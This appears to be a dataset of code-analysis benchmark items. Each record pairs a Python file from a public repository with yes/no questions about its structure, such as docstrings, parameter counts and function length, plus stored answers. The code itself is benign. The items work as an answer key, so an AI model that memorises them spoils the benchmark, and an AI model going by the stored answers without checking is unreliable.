"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self... | 3 | model/complex_res_gate.py | ajyl/MIME |
from django.conf import settings
from storages.backends.s3boto import S3BotoStorage
class S3StaticStorage(S3BotoStorage):
"S3 storage backend that sets the static bucket."
def __init__(self, *args, **kwargs):
super(S3StaticStorage, self).__init__(
bucket=settings.AWS_STATIC_BUCKET_NAME,
custom_domain=settings.AWS_STATIC_CUSTOM_DOMAIN,
secure_urls=False,
*args,
**kwargs
)
class S3MediaStorage(S3BotoStorage):
"S3 storage backend that sets the media bucket."
def __init__(self, *args, **kwargs):
super(S3MediaStorage, self).__init__(
bucket=settings.AWS_STORAGE_BUCKET_NAME,
custom_domain=settings.AWS_S3_CUSTOM_DOMAIN,
secure_urls=False,
*args,
**kwargs
)
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
... | 3 | coderdojochi/custom_storages.py | rgroves/weallcode-website |
"""Test the fogfreq script
"""
from unittest.mock import patch
@patch("argparse.ArgumentParser", autospec=True)
def test_get_parser(ap):
import fogtools.analysis.foghist2d
fogtools.analysis.foghist2d.get_parser()
assert ap.return_value.add_argument.call_count == 1
@patch("fogtools.analysis.foghist2d.get_parser", autospec=True)
@patch("fogtools.plot.Visualiser", autospec=True)
def test_main(v, pc):
import fogtools.analysis.foghist2d
pc.return_value.parse_args.return_value.out = "tofu"
fogtools.analysis.foghist2d.main()
pc.assert_called_once_with()
v.return_value.plot_fog_dt_hist.assert_called_once_with("tofu")
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | tests/test_foghist2d.py | gerritholl/fogtools |
import sys
from os.path import join, relpath, dirname
upper_dir = join(dirname(relpath(__file__)), "..")
sys.path.append(upper_dir)
from torch import nn, cat
from base_model import ImageClassificationLightningModule
from typing import Callable
class EfficientNetLightningModuleWithTwoBackbones(ImageClassificationLightningModule):
def __init__(
self,
backbone_rgb: nn.Module,
backbone_infrared: nn.Module,
get_x_method: Callable,
num_classes: int,
):
super().__init__(backbone_rgb, get_x_method, num_classes)
num_output_nodes = backbone_rgb._fc.out_features
self.classifier = nn.Sequential(
nn.ReLU(),
nn.Linear(2 * num_output_nodes, num_classes),
self.activation,
)
self.backbone_rgb = backbone_rgb
self.backbone_infrared = backbone_infrared
def forward(self, x):
rgb_batch, infrared_batch = x
rgb_latent_space = self.backbone_rgb(rgb_batch)
nir_latent_space = self.backbone_infrared(infrared_batch)
combined_latent_representation = cat(
(rgb_latent_space, nir_latent_space), dim=1
)
return self.classifier(combined_latent_representation)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | app/image_classification/models_with_two_separate_backbones/efficientnet_with_two_separate_backbones.py | tugot17/RGB-Infrared-Classification |
# -*- coding: utf-8 -*-
"""Contains constants for middleware layer."""
from typing import Tuple, Union
class Text:
"""Contains constants for text parameters."""
@property
def global_font(self) -> str:
"""Used for setting global font for text."""
return "Helvetica"
@property
def global_font_size(self) -> Union[float, int]:
"""Used for setting global font size for text."""
return 12
@property
def global_font_color(
self,
) -> Tuple[Union[float, int], Union[float, int], Union[float, int]]:
"""Used for setting global font color for text."""
return 0, 0, 0
@property
def global_text_x_offset(self) -> Union[float, int]:
"""Used for setting global x offset for text."""
return 0
@property
def global_text_y_offset(self) -> Union[float, int]:
"""Used for setting global y offset for text."""
return 0
@property
def global_text_wrap_length(self) -> int:
"""Used for setting global wrap length for text."""
return 100
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer"... | 3 | PyPDFForm/middleware/constants.py | XinyuLiu5566/PyPDFForm |
"""
Runtime: 6200 ms, faster than 5.01% of Python3 online submissions for Container With Most Water.
Memory Usage: 27.5 MB, less than 57.22% of Python3 online submissions for Container With Most Water.
"""
from typing import List
from typing import Optional
class Solution:
def maxArea(self, height: List[int]) -> int:
i = 0
j = len(height) - 1
used_min_vert = min(height[i], height[j])
max_water = (j - i) * used_min_vert
while i+1 != j:
if height[i] > height[j]:
j -= 1
if height[j] < used_min_vert:
continue
else:
i +=1
if height[i] < used_min_vert:
continue
if max(height[i:j]) < min(height[i], height[j]):
break
elif (max(height[i:j]) * (j - i)) < max_water:
break
else:
used_min_vert = min(height[i], height[j])
water = (j - i) * used_min_vert
if water > max_water:
max_water = water
return max_water
def main():
sol = Solution()
print('Output:', sol.maxArea([2,3,10,5,7,8,9]))
print('Expected:', 36)
if __name__ == "__main__":
main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | solutions/11. Container With Most Water.py | JacopoPan/leetcode-top100-liked-questions |
# -*- coding: utf-8 -*-
from flask import request, current_app
from domain.models import Image, Document
from validation.base_validators import ParameterizedValidator
import repo
class CanCreateFacilityValidator(ParameterizedValidator):
def validate(self, f, *args, **kwargs):
user_id = repo.get_user_id_for_user(cookies=request.cookies)
valid = user_id and repo.can_user_create_facility(user_id, cookies=request.cookies)
if not valid:
self.fail("You do not have privileges to create a facility.",
f, 403, None, *args, **kwargs)
class CanEditFacilityValidator(ParameterizedValidator):
def validate(self, f, *args, **kwargs):
if kwargs.get("facility_id", None): # the normal case: a faility
facility_id = kwargs["facility_id"]
elif kwargs.get("image_id", None): # an image related to a facility
image = current_app.db_session.query(Image).get(kwargs["image_id"])
facility_id = image.facility_id
elif kwargs.get("document_id", None): # a document related to a facility
document = current_app.db_session.query(Document).get(kwargs["document_id"])
facility_id = document.facility_id
elif request.form.get('facilityId', None): # POST image/document with facility id in form
facility_id = request.form.get('facilityId')
#this should cover all cases where this decorator is used
user_id = repo.get_user_id_for_user(cookies=request.cookies)
valid = user_id and repo.can_user_edit_facility(user_id, facility_id,
cookies=request.cookies)
if not valid:
self.fail("You do not have privileges to edit facility %s." % facility_id,
f, 403, None, *args, **kwargs)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
}... | 3 | flod_facilities_backend/validation/credential_validators.py | Trondheim-kommune/Bookingbasen |
from ipynta.sourcing import DirectorySniffer
from ipynta.loaders import PillowLoader
from ipynta.transform import GrayscaleTransform
from os import path
import pytest
SAMPLES_DIR = path.dirname(path.abspath(__file__)) + "/sample_images/grayscale"
@pytest.fixture
def sample_images():
img_list = DirectorySniffer().get_img_paths(SAMPLES_DIR)
return PillowLoader().load(img_list)
def _check_if_grayscale(img):
"""Method used for checking if an image is grayscale or colored.
Args:
images (PIL.Image): Image to check.
Returns:
boolean: True if the image is grayscale, False otherwise.
"""
tmp = img.convert('RGB')
w, h = img.size
for i in range(w):
for j in range(h):
r, g, b = tmp.getpixel((i,j))
if r != g != b:
return False
return True
def test_grayscale_transform_init():
try:
GrayscaleTransform()
except Exception:
pytest.fail("GrayscaleTransform constructor failed")
@pytest.mark.parametrize("test_input", [
(None),
([]),
])
def test_grayscale_transform_vs_empty_list(test_input):
grayscale_img_list = GrayscaleTransform().execute(test_input)
output_count = len(grayscale_img_list)
assert(output_count == 0)
assert(isinstance(grayscale_img_list, list))
def test_grayscale_output_count(sample_images):
grayscale_img_list = GrayscaleTransform().execute(sample_images)
output_count = len(grayscale_img_list)
assert(output_count == len(sample_images))
def test_grayscale_output_type(sample_images):
grayscale_img_list = GrayscaleTransform().execute(sample_images)
assert(isinstance(grayscale_img_list, list))
def test_grayscale_output_colors(sample_images):
grayscale_img_list = GrayscaleTransform().execute(sample_images)
grayscale_flags = [_check_if_grayscale(img) for img in grayscale_img_list]
assert(all(grayscale_flags))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | src/tests/transform/test_grayscale_transform.py | allanchua101/ipynta |
import math
import requests
def calc_dist(lat1, lon1, lat2, lon2):
lat1 = math.radians(lat1)
lon1 = math.radians(lon1)
lat2 = math.radians(lat2)
lon2 = math.radians(lon2)
h = math.sin( (lat2 - lat1) / 2 ) ** 2 + \
math.cos(lat1) * \
math.cos(lat2) * \
math.sin( (lon2 - lon1) / 2 ) ** 2
return 6372.8 * 2 * math.asin(math.sqrt(h))
def get_dist(meteor):
return meteor.get('distance', math.inf)
if __name__ == '__main__':
my_loc = (29.424122, -98.493628)
meteor_resp = requests.get('https://data.nasa.gov/resource/y77d-th95.json')
meteor_data = meteor_resp.json()
for meteor in meteor_data:
if not ('reclat' in meteor and 'reclong' in meteor): continue
meteor['distance'] = calc_dist(float(meteor['reclat']),
float(meteor['reclong']),
my_loc[0],
my_loc[1])
meteor_data.sort(key=get_dist)
print(meteor_data[0:10])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | meteors/find_meteors.py | Mathman628/find-close-meteorites |
from PySide import QtGui, QtCore
from AttributeWidgetImpl import AttributeWidget
class ScalarWidget(AttributeWidget):
def __init__(self, attribute, parentWidget=None, addNotificationListener = True):
super(ScalarWidget, self).__init__(attribute, parentWidget=parentWidget, addNotificationListener = addNotificationListener)
hbox = QtGui.QHBoxLayout()
self._widget = QtGui.QLineEdit(self)
validator = QtGui.QDoubleValidator(self)
validator.setDecimals(3)
self._widget.setValidator(validator)
hbox.addWidget(self._widget, 1)
hbox.addStretch(0)
hbox.setContentsMargins(0, 0, 0, 0)
self.setLayout(hbox)
self.setSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
self.updateWidgetValue()
if self.isEditable():
self._widget.editingFinished.connect(self._invokeSetter)
else:
self._widget.setReadOnly(True)
def getWidgetValue(self):
return float(self._widget.text())
def setWidgetValue(self, value):
self._widget.setText(str(round(value, 4)))
@classmethod
def canDisplay(cls, attribute):
return(
attribute.getDataType() == 'Scalar' or
attribute.getDataType() == 'Float32' or
attribute.getDataType() == 'Float64'
)
ScalarWidget.registerPortWidget()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | Python/kraken/ui/DataTypeWidgets/ScalarWidgetImpl.py | FabricExile/Kraken |
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import intersight
from intersight.models.inventory_generic_inventory_holder_ref import InventoryGenericInventoryHolderRef # noqa: E501
from intersight.rest import ApiException
class TestInventoryGenericInventoryHolderRef(unittest.TestCase):
"""InventoryGenericInventoryHolderRef unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInventoryGenericInventoryHolderRef(self):
"""Test InventoryGenericInventoryHolderRef"""
# FIXME: construct object with mandatory attributes with example values
# model = intersight.models.inventory_generic_inventory_holder_ref.InventoryGenericInventoryHolderRef() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | test/test_inventory_generic_inventory_holder_ref.py | sdnit-se/intersight-python |
from __future__ import absolute_import
from __future__ import unicode_literals
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import copy
# \ref page 4, layers=2, forward + backward, concat[forward_projection, backward_projection]
class LstmbiLm(nn.Module):
def __init__(self, config, use_cuda=False):
super(LstmbiLm, self).__init__()
self.config = config
self.use_cuda = use_cuda
self.encoder = nn.LSTM(self.config['encoder']['projection_dim'],
self.config['encoder']['dim'],
num_layers=self.config['encoder']['n_layers'],
bidirectional=True,
batch_first=True,
dropout=self.config['dropout'])
self.projection = nn.Linear(self.config['encoder']['dim'], self.config['encoder']['projection_dim'], bias=True)
def forward(self, inputs):
forward, backward = self.encoder(inputs)[0].split(self.config['encoder']['dim'], 2) # split dim=2 in stride config['encoder']['dim'], here half
return torch.cat([self.projection(forward), self.projection(backward)], dim=2)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | elmoformanylangs/modules/lstm.py | luomou97/ELMoForManyLangs |
class FtpOutputListQueryParams(object):
def __init__(self, offset=None, limit=None, name=None):
# type: (int, int, string_types) -> None
super(FtpOutputListQueryParams, self).__init__()
self.offset = offset
self.limit = limit
self.name = name
@property
def openapi_types(self):
types = {
'offset': 'int',
'limit': 'int',
'name': 'string_types'
}
return types
@property
def attribute_map(self):
attributes = {
'offset': 'offset',
'limit': 'limit',
'name': 'name'
}
return attributes
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than... | 3 | bitmovin_api_sdk/encoding/outputs/ftp/ftp_output_list_query_params.py | jaythecaesarean/bitmovin-api-sdk-python |
import datetime as dt
from flask import current_app
from polylogyx.db.database import db
class ConfigDomain:
def __init__(self, node, remote_addr):
self.node = node
self.remote_addr = remote_addr
def get_config(self):
current_app.logger.info(
"%s - %s checking in to retrieve a new configuration",
self.remote_addr,
self.node,
)
config = self.node.get_config()
# write last_checkin, last_ip
self.node.update(
last_config=dt.datetime.utcnow(),
last_checkin=dt.datetime.utcnow(),
last_ip=self.remote_addr,
)
db.session.add(self.node)
db.session.commit()
return config
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | plgx-esp/polylogyx/domain/config_domain.py | eclecticiq/eiq-er-ce |
class Node:
def __init__(self, x):
self.val = x
self.next = None
def __str__(self):
string = "["
node = self
while node:
string += "{} ->".format(node.val)
node = node.next
string += "None]"
return string
def get_nodes(values):
next_node = None
for value in values[::-1]:
node = Node(value)
node.next = next_node
next_node = node
return next_node
def get_list(head):
node = head
nodes = list()
while node:
nodes.append(node.val)
node = node.next
return nodes
def rotate_ll(llist, k):
cnode = llist
head = cnode
size = 0
while cnode:
tail = cnode
cnode = cnode.next
size += 1
new_head = llist
new_tail = None
for _ in range(size - k):
new_tail = new_head
new_head = new_head.next
tail.next = head
new_tail.next = None
return new_head
# Tests
assert get_list(rotate_ll(get_nodes([7, 7, 3, 5]), 2)) == [3, 5, 7, 7]
assert get_list(rotate_ll(get_nodes([1, 2, 3, 4, 5]), 3)) == [3, 4, 5, 1, 2]
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answ... | 3 | solutions/problem_177.py | ksvr444/daily-coding-problem |
import pandas as pd
import numpy as np
def replace_outliers(data, columns):
'''
Quantile-based Flooring and Capping
'''
df = data.copy()
for column in columns:
ten_percentile = (df[column].quantile(0.10))
ninety_percentile = (df[column].quantile(0.90))
df[column] = np.where(df[column] <ten_percentile, ten_percentile,df[column])
df[column] = np.where(df[column] >ninety_percentile, ninety_percentile,df[column])
return df
def add_knn_feature(model, data, columns_to_drop):
df = data.copy()
df = df.drop(columns_to_drop, axis = 1)
pred = model.predict(df)
df['Knn'] = pred
return df | [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/... | 3 | src/features/build_features.py | HninPwint/nba-career-prediction |
"""modify migration
Revision ID: d1168fc41a41
Revises: 05fe6c4da706
Create Date: 2022-03-14 08:46:15.711561
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd1168fc41a41'
down_revision = '05fe6c4da706'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('blogs', 'text')
op.drop_column('comments', 'comment')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('comments', sa.Column('comment', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('blogs', sa.Column('text', sa.VARCHAR(length=255), autoincrement=False, nullable=True))
# ### end Alembic commands ###
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answe... | 3 | migrations/versions/d1168fc41a41_modify_migration.py | lewis-murgor/Blog |
from models.project import Project
import time
class ProjectHelper:
def __init__(self, app):
self.app = app
def open_projects_page(self):
dw = self.app.dw
if not dw.current_url.endswith("/manage_proj_page.php"):
dw.find_element_by_link_text("Manage").click()
dw.find_element_by_link_text("Manage Projects").click()
def create(self, project):
dw = self.app.dw
self.open_projects_page()
dw.find_element_by_xpath("//input[@value='Create New Project']").click()
dw.find_element_by_name("name").send_keys(project.name)
dw.find_element_by_xpath("//textarea[@name='description']").send_keys(
project.description)
dw.find_element_by_xpath("//input[@value='Add Project']").click()
time.sleep(3)
def get_projects_list(self):
dw = self.app.dw
self.open_projects_page()
projects = []
for element in dw.find_elements_by_xpath(
"//table[@class='width100']//tr[contains(@class, 'row')]"):
name = element.find_element_by_xpath(".//td[1]").text
description = element.find_element_by_xpath(".//td[5]").text
projects.append(Project(name=name, description=description))
projects.pop(0)
return projects
def delete_by_index(self, index):
dw = self.app.dw
self.open_projects_page()
dw.find_elements_by_xpath("//table[@class='width100']//tr[contains("
"@class, 'row')]//td//a[contains("
"@href, 'edit')]")[index].click()
time.sleep(1)
dw.find_element_by_xpath("//input[@value='Delete Project']").click()
dw.find_element_by_xpath("//input[@value='Delete Project']").click()
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | fixture/projects.py | AndreevaAnastasiya/py_training_mantis |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this is to generate a config file when the --config flag is passed
from configparser import ConfigParser
import logging
from pathlib import Path
from .input_utils import choice, yes_or_no
log = logging.getLogger('pfg.config')
log.addHandler(logging.NullHandler())
home = Path.home()
def make_pfgrc():
config = home.joinpath(".config/pfg/pfgrc")
if config.exists():
if config.is_file():
if yes_or_no("a pfgrc file exists. overwrite the old one?"):
config.touch()
else:
print(f'{config} exists and is not a file')
else:
if yes_or_no("make pfgrc at \'{config}\'"):
try:
config.parent.mkdir()
print(f'creating \'{config.parent}\'')
except FileExistsError:
print(f'\'{config.parent}\' exists')
print('writing \'pfgrc\'')
config.touch()
else:
print('not creating \'pfgrc\' file')
print()
# actually write file.. in the future
def make_template_dir():
template_dir = home.joinpath(".config/pfg/templates")
print('checking if a template folder exists')
print()
if template_dir.exists():
print('a folder for custom templates already exists')
print(f'here -> \'{template_dir}\'')
else:
print('no template folder found')
if yes_or_no(f'create \'{template_dir}\'?'):
print(f'creating template folder at \'{template_dir}\'')
template_dir.mkdir(parents=True)
# move sample.fgt here to reference
else:
print('not creating template dir')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | pfg/config_utils.py | michaelfreyj/pfg |
# imports - module imports
from pipupgrade import cli
from pipupgrade.table import _sanitize_string, Table
def test__sanitize_string():
assert _sanitize_string(cli.format("foobar", cli.GREEN)) == "foobar"
assert _sanitize_string(cli.format("foobar", cli.BOLD)) == "foobar"
def test_table():
table = Table()
assert table.empty
dummy = ["foo", "bar"]
table.insert(dummy)
assert not table.empty
string = table.render()
assert string.count("\n") == 1
table.header = dummy
string = table.render()
assert string.count("\n") == 2
table.insert(dummy)
string = table.render()
assert string.count("\n") == 3 | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fals... | 3 | tests/pipupgrade/test_table.py | max-nicholson/pipupgrade |
from unittest import TestCase
from pya import *
import numpy as np
import logging
logging.basicConfig(level=logging.DEBUG)
class TestUgen(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_sine(self):
sine = Ugen().sine(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
self.assertEqual(44100 // 2, sine.sr)
self.assertAlmostEqual(0.5, np.max(sine.sig), places=6)
self.assertEqual((44100 // 2, 2), sine.sig.shape)
def test_cos(self):
cos = Ugen().cos(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
self.assertEqual(44100 // 2, cos.sr)
self.assertAlmostEqual(0.5, np.max(cos.sig), places=6)
self.assertEqual((44100 // 2, 2), cos.sig.shape)
def test_square(self):
square = Ugen().square(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
self.assertEqual(44100 // 2, square.sr)
self.assertAlmostEqual(0.5, np.max(square.sig), places=6)
self.assertEqual((44100 // 2, 2), square.sig.shape)
def test_sawooth(self):
saw = Ugen().sawtooth(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
self.assertEqual(44100 // 2, saw.sr)
self.assertAlmostEqual(0.5, np.max(saw.sig), places=6)
self.assertEqual((44100 // 2, 2), saw.sig.shape)
def test_noise(self):
white = Ugen().noise(type="white")
pink = Ugen().noise(type="pink")
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | tests/test_ugen.py | m---w/pya |
import socket
import os
import time
def do_sleep():
time.sleep(1)
def do_work():
from random import random
iterations = 5_000_000
count = 0
for _ in range(iterations):
x = random()
y = random()
if x*x + y*y <= 1.0:
count = count + 1
pi = 4.0 * count / iterations
print(pi)
def handler(event, context):
init_time = time.time()
print('Python function START')
if context is not None:
func_activation_ID = context.aws_request_id
func_mem_limit = context.memory_limit_in_mb
# Identify container
host_name = socket.gethostname()
host_ip = socket.gethostbyname(host_name)
command = 'cat /proc/self/cgroup | grep sandbox-root'
container_id = os.popen(command).read().rstrip()
command = 'cat /proc/uptime | tr " " "\n" | head -1'
uptime = os.popen(command).read().rstrip()
# do_sleep()
do_work()
print('Python function END')
end_time = time.time()
return {
'initTime_ms': init_time*1000,
'endTime_ms': end_time*1000,
'duration_ms': (end_time-init_time)*1000,
'funcActivationID': func_activation_ID,
'hostname': host_name,
'hostnameIP': host_ip,
'containerID': container_id,
'mem_limit': func_mem_limit,
'uptime': uptime,
}
if __name__ == "__main__":
print(handler({}, None))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | aws/test_function.py | danielBCN/faas-parallelism-benchmark |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains utilities for monitoring client side calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
class Context(six.with_metaclass(abc.ABCMeta, object)):
"""Interface for implementations of client monitoring context manager.
All client operations are executed inside this context.
"""
@abc.abstractmethod
def __init__(self, operation):
pass
@abc.abstractmethod
def __enter__(self):
return self
@abc.abstractmethod
def __exit__(self, exc_type,
exc_value,
traceback):
pass
class Nop(Context):
"""Default implementation of Context that does nothing."""
# pylint: disable=useless-super-delegation
def __init__(self, operation):
super(Nop, self).__init__(operation)
def __enter__(self):
return self
def __exit__(self, exc_type,
exc_value,
traceback):
pass
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | client/monitor_.py | tungsten-infra/containerregistry |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
'''
Test that creating a user with an email is successful
'''
email = 'test@gmail.com'
password = '456@3'
username = 'test1'
user = get_user_model().objects.create_user(
email = email,
username = username
)
user.set_password(password)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_user_email_is_normalised(self):
'''
Test that user email used to sign in is normalized
'''
email = 'test@STONEWELLTECH.com'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
def test_create_user_invalid_email(self):
'''
Test creating user with no email raises an error
'''
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_super_user(self):
'''Test creating a superuser'''
user = get_user_model().objects.create_superuser(
'test@stonewelltech.com',
'test123'
)
self.assertTrue(user.is_superuser) # is_superuser is added by PermissionsMixin
self.assertTrue(user.is_staff)
class UserModelTests(TestCase):
'''
Test whether the user characteristics are saved well
'''
def setUp(self):
self.client = Client()
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email = 'user@stonewelltech.com',
username = 'Test username'
)
user.set_password(password) | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fals... | 3 | backend/user/tests/test_models.py | Ssents/stonewell_tech |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.14.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import kubernetes_asyncio.client
from kubernetes_asyncio.client.models.v1beta1_stateful_set_status import V1beta1StatefulSetStatus # noqa: E501
from kubernetes_asyncio.client.rest import ApiException
class TestV1beta1StatefulSetStatus(unittest.TestCase):
"""V1beta1StatefulSetStatus unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1beta1StatefulSetStatus(self):
"""Test V1beta1StatefulSetStatus"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes_asyncio.client.models.v1beta1_stateful_set_status.V1beta1StatefulSetStatus() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer":... | 3 | kubernetes_asyncio/test/test_v1beta1_stateful_set_status.py | aK0nshin/kubernetes_asyncio |
import unittest.mock as mock
import pytest
import requests
from transiter.scheduler import client
@pytest.fixture
def scheduler_post_response(monkeypatch):
response = mock.Mock()
def post(*args, **kwargs):
return response
monkeypatch.setattr(requests, "post", post)
return response
@pytest.fixture
def scheduler_get_response(monkeypatch):
response = mock.Mock()
def get(*args, **kwargs):
return response
monkeypatch.setattr(requests, "get", get)
return response
def test_ping__pass(scheduler_get_response):
scheduler_get_response.raise_for_status = lambda: None
scheduler_get_response.text = "3"
assert client.ping() == 3
def test_ping__fail(scheduler_get_response):
scheduler_get_response.raise_for_status.side_effect = requests.RequestException()
assert client.ping() is None
def test_refresh_tasks__pass(scheduler_post_response):
scheduler_post_response.raise_for_status = lambda: None
assert client.refresh_tasks() is True
